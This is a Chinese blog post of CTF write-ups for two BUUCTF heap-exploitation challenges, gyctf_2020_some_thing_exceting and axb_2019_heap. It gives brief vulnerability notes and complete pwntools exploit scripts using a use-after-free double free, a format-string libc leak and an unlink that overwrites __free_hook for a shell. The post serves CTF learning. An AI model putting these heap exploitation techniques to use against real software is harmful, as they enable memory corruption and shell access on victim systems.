buuctf 2022 3.10

最新推荐文章于 2023-10-17 15:23:43 发布
最新推荐文章于 2023-10-17 15:23:43 发布
阅读量213 收藏
点赞数
分类专栏: PWN 文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123410508
版权

gyctf_2020_some_thing_exceting:

漏洞点:

存在uaf漏洞。

思路:

通过uaf漏洞进行double_free,修改fd即可malloc flag所在地。

exp:

from pwn import *
from LibcSearcher import * 
context.terminal = ['tmux', 'splitw', '-h']
local_file  = './gy1'
local_libc  = './libc-2.23.so'
# remote_libc = './libc-2.23.so'
e = ELF(local_file) 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = e.libc
else:
    r = remote('node4.buuoj.cn', 28498)
    #libc = ELF(remote_libc)
context.log_level = 'debug'
context.arch = e.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims             :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\x00'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\x00'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

chunk_addr = 0x6020c0
def dbg(cmd=''):
     gdb.attach(r,cmd)
def fmt(prev, word, index):
    ret_str = b""
    if prev < word:
        result = word - prev
        ret_str = b"%" + str(result).encode() + b"c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        ret_str = b"%" + str(result).encode() + b"c"
    ret_str += b"%" + str(index).encode() + b"$hhn"
    return ret_str
def fmt_str(offset, size, addr, target):
    payload = b""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

flag_addr = 0x6020A8
chunk_addr = 0x602040
r.timeout = 0.5
def add(a_size,a_desc,b_size,b_desc):
    ru(b"want to do :")
    sl(b'1')
    ru(b'length : ')
    sl(str(a_size).encode())
    ru(b'ba :')
    sl(a_desc)
    ru(b'length : ')
    sl(str(b_size).encode())
    ru(b'na :')
    sl(b_desc)

# def edit():
#     ru(b"want to do :")
#     sl(b'2')

def delete(index):
    ru(b"want to do :")
    sl(b'3')
    ru(b'> Banana ID :')
    sl(str(index).encode())

def show(index):
    ru(b"want to do :")
    sl(b'4')
    ru(b'ID : > SCP project ID :')
    sl(str(index).encode())

add(0x50,b'aaaa',0x50,b'bbbb') 
# show(0)
# ru(b'na is ')
# addr = u32(rc(4))
# success(hex(addr))
add(0x50,b'aaaa',0x50,b'bbbb')

delete(0)
delete(1)
delete(0)
add(0x50,p64(flag_addr-0x10),0x50,b'')
add(0x50,'aaaa',0x50,'bbbb')
add(0x50,b'',0x20,b'')
show(4)
r.interactive()

axb_2019_heap:

思路:

格式化字符串泄露libc,unlink实现任意地址写,free_hook写为system或者one_gadget

exp:

from pwn import *

context.log_level = 'debug'

p=remote('node4.buuoj.cn',27875)
elf=ELF('./axb_2019_heap')
libc=ELF("./libc-2.23 .so")

def add(idx,size,content):
    p.sendlineafter('>>','1')
    p.sendlineafter('):',str(idx))
    p.sendlineafter('size:',str(size))
    p.sendlineafter('content:',content)

def delete(idx):
    p.sendlineafter('>>','2')
    p.sendlineafter('index:',str(idx))

def edit(idx,content):
    p.sendlineafter('>>','4')
    p.sendlineafter('index:',str(idx))
    p.sendlineafter('content: \n',content)

def show():
    p.sendlineafter('>>','3')

p.recvuntil('name: ')
p.sendline('%11$p%15$p')
p.recvuntil('Hello, ')
base=int(p.recv(14),16)-0x1186
libcbase=int(p.recv(14),16)-libc.sym['__libc_start_main']-240
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
bss=base+0x202060
add(0,0x98,'a'*0x98)#0
add(1,0x98,'bbbb')#1
add(2,0x90,'cccc')#2
add(3,0x90,'/bin/sh\x00')#3

payload=p64(0)+p64(0x91)+p64(bss-0x18)+p64(bss-0x10)+p64(0)*14+p64(0x90)+'\xa0'
edit(0,payload)
delete(1)
edit(0,p64(0)*3+p64(free_hook)+p64(0x10))
edit(0,p64(system))
delete(3)
p.interactive()

 

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 930
这是我第一次自己做出来的题,,????动 没什么特别,,看一看代码 还是一个块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 509
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的快,结构如图所示,可以看到每个块包含了两个部分 然后我们释放这两个块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
buuctf 2022 3.9
m0_57754423的博客
03-10 4803
ciscn_2019_es_1 保护机制: 保护全开 漏洞点: 这里指针未清空,存在uaf漏洞。 利用思路: 首先malloc一个size大于0x408的chunk,这样的话 就可以绕过tcache了。 然后free掉,之后再dump一下,就可以泄露main_arena + 96 的地址了 这样就可以获得 libc的基地址 和 free_hook了 利用tcache 的double free漏洞 修改fd指针 然后malloc 这样就可以写入free_hook为 one_gad
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 328
这道题可以用来当做的入门题来做 开了NX 这是的菜单;
[BUUCTF]PWN——gyctf_2020_document(UAF
mcmuyanga的博客
03-22 738
gyctf_2020_document 例行检查,64位程序,保护全开 漏洞在free chunk的时候 简单看一下其他几个功能函数 add() 像我这样的新手,可以申请几个chunk看一下,方便理清楚的内部情况 show(),根据存放在bss段的0x202060指针数组来输出对应的chunk里的值 edit() 利用思路 申请一个chunk,释放掉,在show,由于存在uaf,这样就泄露了libc 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chun
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1066
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
python3.10安装包
08-23
Python 3.10是Python编程语言的一个重要版本,它带来了许多新特性和改进,旨在提升开发者的效率和代码性能。这个安装包是为AMD64(也称为x86-64)架构设计的,这意味着它适用于大多数现代64位Windows系统。以下是...
python3.10对应的dlib版本
09-01
分享资源~
python 3.10.11
09-05
python官网下载的python3.10.11,包含以下python安装包: Gzipped source tarball XZ compressed source tarball macos 64-bit universal2 installer Windows embeddable package (32-bit) Windows embeddable ...
dlib库的whl文件大全-适配pyhon3.6-3.10各个版本的
07-17
特别强调了适配Python3.6到3.10各个版本,尤其是提到了对Python3.10的支持,这在描述中被指出是目前官方可能尚未提供的。 描述中提到,“鉴于如今尚无支持python3.10的dlib库”,暗示了dlib官方仓库或PyPI上可能...
pwnable.kr-uaf WP
Casuall的博客
06-22 518
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 238
buuctf-pwn 039~046题
BUUCTF-做题记录
最新发布
qq_46230755的博客
10-17 497
很久没做题了,还是随便来水一水吧,之前都在学别的。
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 808
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 342
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个头;程序申请的0x10的块起到了存放指针的作用,很正常的布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将块释放后,未将指针置空,存在uaf;先申请2个查看布局;漏洞点在删除功能处,...
从gyctf_2020_some_thing_exceting复习double free机制(glibc-2.23源码分析向
Tw0的博客
02-10 161
当我们进行double free攻击的时候,如果有一个管理块存储着多个下级chunk的指针,那么需要特别注意和管理chunk同样大小的chunk的申请和释放,因为free fastbin chunk的时候,会对其fd指针进行修改,从而导致程序寻找的块出现偏差。
gyctf_2020_some_thing_exceting
qq_62887641的博客
08-26 106
如果我们再申请0x50的话,就会把flag也申请进来,但是没有特定的size给他,就会无法绕过fastbin检查,然后就无法getshell了。初步思路就是利用doublefree改fd然后绕过fastbin,看看下面是否满足。下面exp15行为什么是0x60,调试一下就知道了。add这里每次调用一次add就申请了3个,调用第一个存储的指针输出我们写的两个内容。,正好可以利用起来绕过fastbin的检查。菜单上有edit,实际上没有,不贴了。,到这里基本就可以getshell了。
[LineCTF2022]BB
Sk1y的博客
06-18 1539
八进制,RCE,利用环境变量进行注入
vs2022配置py3.10
09-21
配置VS 2022来使用Python 3.10的步骤如下: 1. 首先,确保你已经在你的计算机上安装了Python 3.10版本。你可以从Python官方网站下载Python 3.10的压缩包[引用2]。 2. 解压下载的压缩包,并将解压后的文件夹路径复制。 3. 打开Visual Studio 2022,点击菜单栏中的"工具",然后选择"选项"。 4. 在选项窗口中,展开"Python 工具",选择"环境"。 5. 在"环境"选项中,点击"Python 3.10",然后点击"复制"按钮,将复制的文件夹路径粘贴到"Python 3.10"的文本框中。 6. 确保"Python 3.10"的复选框被选中,然后点击"应用"和"确定"按钮。 7. 现在,你可以在Visual Studio 2022中使用Python 3.10了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值